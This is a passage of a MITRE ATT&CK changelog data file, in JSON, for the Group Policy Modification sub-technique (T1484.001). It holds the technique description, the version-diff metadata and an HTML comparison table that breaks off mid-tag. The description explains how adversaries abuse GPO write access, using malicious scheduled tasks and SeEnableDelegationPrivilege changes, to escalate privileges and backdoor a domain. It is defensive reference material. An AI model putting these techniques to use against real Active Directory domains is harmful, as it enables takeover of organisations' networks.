                    "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code>&lt;GPO_PATH&gt;\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code>&lt;GPO_PATH&gt;\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1484/001",
                            "external_id": "T1484.001"
                        },
                        {
                            "source_name": "Mandiant M Trends 2016",
                            "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf"
                        },
                        {
                            "source_name": "ADSecurity GPO Persistence 2016",
                            "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.",
                            "url": "https://adsecurity.org/?p=2716"
                        },
                        {
                            "source_name": "Microsoft Hacking Team Breach",
                            "description": "Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.",
                            "url": "https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/"
                        },
                        {
                            "source_name": "Wald0 Guide to GPOs",
                            "description": "Robbins, A. (2018, April 2). A Red Teamer\u2019s Guide to GPOs and OUs. Retrieved March 5, 2019.",
                            "url": "https://wald0.com/?p=179"
                        },
                        {
                            "source_name": "Harmj0y Abusing GPO Permissions",
                            "description": "Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved September 23, 2024.",
                            "url": "https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/"
                        },
                        {
                            "source_name": "Harmj0y SeEnableDelegationPrivilege Right",
                            "description": "Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved September 23, 2024.",
                            "url": "https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/"
                        },
                        {
                            "source_name": "TechNet Group Policy Basics",
                            "description": "srachui. (2012, February 13). Group Policy Basics \u2013 Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.",
                            "url": "https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Itamar Mizrahi, Cymptom",
                        "Tristan Bennett, Seamless Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.883000+00:00\", \"old_value\": \"2025-10-24 17:48:50.475000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\\\<DOMAIN>\\\\SYSVOL\\\\<DOMAIN>\\\\Policies\\\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \\n\\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\\n\\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\\n\\nFor example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code>&lt;GPO_PATH&gt;\\\\Machine\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code>&lt;GPO_PATH&gt;\\\\MACHINE\\\\Microsoft\\\\Windows NT\\\\SecEdit\\\\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)\", \"old_value\": \"Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\\\<DOMAIN>\\\\SYSVOL\\\\<DOMAIN>\\\\Policies\\\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \\n\\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\\n\\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\\n\\nFor example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code>&lt;GPO_PATH&gt;\\\\Machine\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code>&lt;GPO_PATH&gt;\\\\MACHINE\\\\Microsoft\\\\Windows NT\\\\SecEdit\\\\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)\", \"diff\": \"--- \\n+++ \\n@@ -2,6 +2,6 @@\\n \\n Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\\n \\n-Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\\n+Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\\n \\n For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code>&lt;GPO_PATH&gt;\\\\Machine\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code>&lt;GPO_PATH&gt;\\\\MACHINE\\\\Microsoft\\\\Windows NT\\\\SecEdit\\\\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to25__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to25__0\"><a href=\"#difflib_chg_to25__top\">t</a></td><td class=\"diff_header\" id=\"from25_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;modify&nbsp;Group&nbsp;Policy&nbsp;Objects&nbsp;(GPOs)&nbsp;to&nbsp;subver</td><td class=\"diff_next\"><a href=\"#difflib_chg_to25__top\">t</a></td><td class=\"diff_header\" id=\"to25_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;modify&nbsp;Group&nbsp;Policy&nbsp;Objects&nbsp;(GPOs)&nbsp;to&nbsp;subver</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;the&nbsp;intended&nbsp;discretionary&nbsp;access&nbsp;controls&nbsp;for&nbsp;a&nbsp;domain,&nbsp;u</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;the&nbsp;intended&nbsp;discretionary&nbsp;access&nbsp;controls&nbsp;for&nbsp;a&nbsp;domain,&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sually&nbsp;with&nbsp;the&nbsp;intention&nbsp;of&nbsp;escalating&nbsp;privileges&nbsp;on&nbsp;the&nbsp;do</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sually&nbsp;with&nbsp;the&nbsp;intention&nbsp;of&nbsp;escalating&nbsp;privileges&nbsp;on&nbsp;the&nbsp;do</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">main.&nbsp;Group&nbsp;policy&nbsp;allows&nbsp;for&nbsp;centralized&nbsp;management&nbsp;of&nbsp;user</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">main.&nbsp;Group&nbsp;policy&nbsp;allows&nbsp;for&nbsp;centralized&nbsp;management&nbsp;of&nbsp;user</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;and&nbsp;computer&nbsp;settings&nbsp;in&nbsp;Active&nbsp;Directory&nbsp;(AD).&nbsp;GPOs&nbsp;are&nbsp;co</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;and&nbsp;computer&nbsp;settings&nbsp;in&nbsp;Active&nbsp;Directory&nbsp;(AD).&nbsp;GPOs&nbsp;are&nbsp;co</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ntainers&nbsp;for&nbsp;group&nbsp;policy&nbsp;settings&nbsp;made&nbsp;up&nbsp;of&nbsp;files&nbsp;stored&nbsp;w</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ntainers&nbsp;for&nbsp;group&nbsp;policy&nbsp;settings&nbsp;made&nbsp;up&nbsp;of&nbsp;files&nbsp;stored&nbsp;w</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ithin&nbsp;a&nbsp;predictable&nbsp;network&nbsp;path&nbsp;`\\&lt;DOMAIN&gt;\\SYSVOL\\&lt;DOMAIN&gt;\\</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ithin&nbsp;a&nbsp;predictable&nbsp;network&nbsp;path&nbsp;`\\&lt;DOMAIN&gt;\\SYSVOL\\&lt;DOMAIN&gt;\\</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Policies\\`.(Citation:&nbsp;TechNet&nbsp;Group&nbsp;Policy&nbsp;Basics)(Citation:</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Policies\\`.(Citation:&nbsp;TechNet&nbsp;Group&nbsp;Policy&nbsp;Basics)(Citation:</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;ADSecurity&nbsp;GPO&nbsp;Persistence&nbsp;2016)&nbsp;&nbsp;&nbsp;Like&nbsp;other&nbsp;objects&nbsp;in&nbsp;AD</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;ADSecurity&nbsp;GPO&nbsp;Persistence&nbsp;2016)&nbsp;&nbsp;&nbsp;Like&nbsp;other&nbsp;objects&nbsp;in&nbsp;AD</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;GPOs&nbsp;have&nbsp;access&nbsp;controls&nbsp;associated&nbsp;with&nbsp;them.&nbsp;By&nbsp;default</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;GPOs&nbsp;have&nbsp;access&nbsp;controls&nbsp;associated&nbsp;with&nbsp;them.&nbsp;By&nbsp;default</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;all&nbsp;user&nbsp;accounts&nbsp;in&nbsp;the&nbsp;domain&nbsp;have&nbsp;permission&nbsp;to&nbsp;read&nbsp;GPO</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;all&nbsp;user&nbsp;accounts&nbsp;in&nbsp;the&nbsp;domain&nbsp;have&nbsp;permission&nbsp;to&nbsp;read&nbsp;GPO</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s.&nbsp;It&nbsp;is&nbsp;possible&nbsp;to&nbsp;delegate&nbsp;GPO&nbsp;access&nbsp;control&nbsp;permissions</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s.&nbsp;It&nbsp;is&nbsp;possible&nbsp;to&nbsp;delegate&nbsp;GPO&nbsp;access&nbsp;control&nbsp;permissions</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;e.g.&nbsp;write&nbsp;access,&nbsp;to&nbsp;specific&nbsp;users&nbsp;or&nbsp;groups&nbsp;in&nbsp;the&nbsp;doma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;e.g.&nbsp;write&nbsp;access,&nbsp;to&nbsp;specific&nbsp;users&nbsp;or&nbsp;groups&nbsp;in&nbsp;the&nbsp;doma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">in.&nbsp;&nbsp;Malicious&nbsp;GPO&nbsp;modifications&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;implement&nbsp;ma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">in.&nbsp;&nbsp;Malicious&nbsp;GPO&nbsp;modifications&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;implement&nbsp;ma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ny&nbsp;other&nbsp;malicious&nbsp;behaviors&nbsp;such&nbsp;as&nbsp;[Scheduled&nbsp;Task/Job](ht</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ny&nbsp;other&nbsp;malicious&nbsp;behaviors&nbsp;such&nbsp;as&nbsp;[Scheduled&nbsp;Task/Job](ht</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tps://attack.mitre.org/techniques/T1053),&nbsp;[Disable&nbsp;or&nbsp;Modify</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tps://attack.mitre.org/techniques/T1053),&nbsp;[Disable&nbsp;or&nbsp;Modify</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Tools](https://attack.mitre.org/techniques/T15<span class=\"diff_sub\">62/001</span>),&nbsp;[Ing</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Tools](https://attack.mitre.org/techniques/T1<span class=\"diff_add\">68</span>5),&nbsp;[Ingress</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ress&nbsp;Tool&nbsp;Transfer](https://attack.mitre.org/techniques/T110</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Tool&nbsp;Transfer](https://attack.mitre.org/techniques/T1105),&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">5),&nbsp;[Create&nbsp;Account](https://attack.mitre.org/techniques/T11</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">[Create&nbsp;Account](https://attack.mitre.org/techniques/T1136),</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">36),&nbsp;[Service&nbsp;Execution](https://attack.mitre.org/techniques</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;[Service&nbsp;Execution](https://attack.mitre.org/techniques/T15</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/T1569/002),&nbsp;&nbsp;and&nbsp;more.(Citation:&nbsp;ADSecurity&nbsp;GPO&nbsp;Persistence</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">69/002),&nbsp;&nbsp;and&nbsp;more.(Citation:&nbsp;ADSecurity&nbsp;GPO&nbsp;Persistence&nbsp;201</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;2016)(Citation:&nbsp;Wald0&nbsp;Guide&nbsp;to&nbsp;GPOs)(Citation:&nbsp;Harmj0y&nbsp;Abus</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">6)(Citation:&nbsp;Wald0&nbsp;Guide&nbsp;to&nbsp;GPOs)(Citation:&nbsp;Harmj0y&nbsp;Abusing&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;GPO&nbsp;Permissions)(Citation:&nbsp;Mandiant&nbsp;M&nbsp;Trends&nbsp;2016)(Citat</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">GPO&nbsp;Permissions)(Citation:&nbsp;Mandiant&nbsp;M&nbsp;Trends&nbsp;2016)(Citation:</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion:&nbsp;Microsoft&nbsp;Hacking&nbsp;Team&nbsp;Breach)&nbsp;Since&nbsp;GPOs&nbsp;can&nbsp;control&nbsp;s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Microsoft&nbsp;Hacking&nbsp;Team&nbsp;Breach)&nbsp;Since&nbsp;GPOs&nbsp;can&nbsp;control&nbsp;so&nbsp;ma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;many&nbsp;user&nbsp;and&nbsp;machine&nbsp;settings&nbsp;in&nbsp;the&nbsp;AD&nbsp;environment,&nbsp;ther</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ny&nbsp;user&nbsp;and&nbsp;machine&nbsp;settings&nbsp;in&nbsp;the&nbsp;AD&nbsp;environment,&nbsp;there&nbsp;ar</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;are&nbsp;a&nbsp;great&nbsp;number&nbsp;of&nbsp;potential&nbsp;attacks&nbsp;that&nbsp;can&nbsp;stem&nbsp;from</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;a&nbsp;great&nbsp;number&nbsp;of&nbsp;potential&nbsp;attacks&nbsp;that&nbsp;can&nbsp;stem&nbsp;from&nbsp;thi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;this&nbsp;GPO&nbsp;abuse.(Citation:&nbsp;Wald0&nbsp;Guide&nbsp;to&nbsp;GPOs)&nbsp;&nbsp;For&nbsp;example</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;GPO&nbsp;abuse.(Citation:&nbsp;Wald0&nbsp;Guide&nbsp;to&nbsp;GPOs)&nbsp;&nbsp;For&nbsp;example,&nbsp;pu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;publicly&nbsp;available&nbsp;scripts&nbsp;such&nbsp;as&nbsp;&lt;code&gt;New-GPOImmediateT</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">blicly&nbsp;available&nbsp;scripts&nbsp;such&nbsp;as&nbsp;&lt;code&gt;New-GPOImmediateTask&lt;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ask&lt;/code&gt;&nbsp;can&nbsp;be&nbsp;leveraged&nbsp;to&nbsp;automate&nbsp;the&nbsp;creation&nbsp;of&nbsp;a&nbsp;ma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/code&gt;&nbsp;can&nbsp;be&nbsp;leveraged&nbsp;to&nbsp;automate&nbsp;the&nbsp;creation&nbsp;of&nbsp;a&nbsp;malici</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">licious&nbsp;[Scheduled&nbsp;Task/Job](https://attack.mitre.org/techni</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ous&nbsp;[Scheduled&nbsp;Task/Job](https://attack.mitre.org/techniques</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ques/T1053)&nbsp;by&nbsp;modifying&nbsp;GPO&nbsp;settings,&nbsp;in&nbsp;this&nbsp;case&nbsp;modifyin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/T1053)&nbsp;by&nbsp;modifying&nbsp;GPO&nbsp;settings,&nbsp;in&nbsp;this&nbsp;case&nbsp;modifying&nbsp;&lt;c</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;&lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\\Machine\\Preferences\\ScheduledTasks\\</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ode&gt;&amp;lt;GPO_PATH&amp;gt;\\Machine\\Preferences\\ScheduledTasks\\Sche</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ScheduledTasks.xml&lt;/code&gt;.(Citation:&nbsp;Wald0&nbsp;Guide&nbsp;to&nbsp;GPOs)(Ci</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">duledTasks.xml&lt;/code&gt;.(Citation:&nbsp;Wald0&nbsp;Guide&nbsp;to&nbsp;GPOs)(Citati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation:&nbsp;Harmj0y&nbsp;Abusing&nbsp;GPO&nbsp;Permissions)&nbsp;In&nbsp;some&nbsp;cases&nbsp;an&nbsp;ad</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on:&nbsp;Harmj0y&nbsp;Abusing&nbsp;GPO&nbsp;Permissions)&nbsp;In&nbsp;some&nbsp;cases&nbsp;an&nbsp;advers</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">versary&nbsp;might&nbsp;modify&nbsp;specific&nbsp;user&nbsp;rights&nbsp;like&nbsp;SeEnableDeleg</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ary&nbsp;might&nbsp;modify&nbsp;specific&nbsp;user&nbsp;rights&nbsp;like&nbsp;SeEnableDelegatio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ationPrivilege,&nbsp;set&nbsp;in&nbsp;&lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\\MACHINE\\Micros</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 